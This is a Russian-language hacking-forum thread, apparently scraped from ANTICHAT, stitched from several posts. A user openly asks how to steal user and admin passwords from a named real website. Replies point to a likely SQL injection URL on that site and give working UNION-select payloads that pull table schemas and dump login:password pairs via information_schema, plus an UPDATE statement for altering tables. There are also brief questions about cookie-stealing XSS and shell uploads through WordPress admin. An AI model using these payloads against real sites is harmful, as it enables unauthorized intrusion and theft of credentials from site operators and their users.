ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Прошу помочь если вообще способы залившке шелла через админку WordPress'a?

хорошо а могу я прикрутить UPDATE? и как это должно выглядить...

Всем привет , в кратце обьясню , всю жизнь работал СИ , вполне успешно никогда не жаловался =) ! Сейчас встал вопрос скажем так прогресса , вопрос куда двигаться от чего плясать , ЗАРАНЕЕ извеняюсь если задам кучу глупых вопросов , всё что я прошу подсказать , дальше сам разберусь .
есть сайтик нуу допустим http://portal.kurkino.net.ru/ насмотревшись всяких крутых роликов я начал с дуру подбирать всякие словечки в итоге нашёл "test.php" "/test/" "/test/admin/" как я понял сервак стоит на апаче , нооо дальше я не ушёл , и вот в чём просьба , скажите пожалуйста , а лучше киньте ссылки на статьи , предположим цель ну скажем выведать пороли пользователей или пороли админа , какие технологии и вообще знания стоят применять , Всё что связанно с соц инженерии сразу отпадает я и так всё знаю , уже не интересно , я крайне надеюсь что вы поняли чего я хочу , просто подскажите что к чему и зачем . Заранее спасибо

П.С.- с удовольствием возьму уроки(естессно не бесплатно) у знающего дело профессионала , который мне всё разжуёт ! Спасибо за внимание. Не судите строго.

хм...
на роль "знающего профессионала" я не претемндую, но все же выскажу парочку своих соображений:

1. во-первых, (хотя это дело вкуса) посмотрел бы движок сайта. что-то мне подсказывает, что там должна быть скуль (SQL-inj).
http://portal.kurkino.net.ru/portal.php?module=news&view_gid=4'
Про скули почитай в этой же ветке форума.

2. во-вторых, сайтец построен как минимум на двух движках:
- движок сайта - смотри в самом низу страницы: Portal System ULN-Web. Зная PHP и имея на руках исходные его коды можно самому найти уязвимость в двиге. Как вариант - пошерстить по багтракам - мож уязвимость там уже нашли.
- движок форума - см. выше.
А вот для изучения исходников тебе понадобится выучить PHP. На ачате для этого материалов предостаточно.

И вообще, как вариант, можешь, опять же на форуме просто попросить взломать сайт =)

удачи...

m0use, ты видишь все таблицы SQL, там же будут и от форума.
UPDATE имя_таблицы SET поле=значение

Пассивный XSS
--
не подскажите почему не работает мой скрипт? мой скрипт - по сути это а в оригенале xxs-xxs.nm.ru/js.js - там Помогите плиз разобраться =(
И еще вопрос.. если тырю куки с zzz.ru то и дыра должна быть в zzz.ru ? Спасибо

bobob, возможно таблицы находятся в других базах. Узнай базу таблицы:

... , concat(table_name,0x3a,table_schema), ... +from+information_schema.tables

а потом пиши имя базы перед именем таблицы

... ,password, ... +from+имя_базы.users/*


А возможно просто нету доступа к этим таблицам :\

Типа такого

script.php?id=-1+union+select+1,2,password,4+from+used.used_users/*

bobob, ты читал мануалы по инъекциям ? )) Перечитай )))

Допустим у тебя есть таблица calendarusers. Тебе нужно узнать в какой БД она находится. Для этого пишешь запрос

script.php?id=-1+union+select+1,2,table_schema,4+from+information _schema.tables+where+table_name='calendarusers'/*

Допустим в ответ вывело - firstbd. Тогда составляешь запрос

script.php?id=-1+union+select+1,2,concat_ws(0x2F,login,password), 4+from+firstbd.calendarusers/*

Теперь делай по аналогии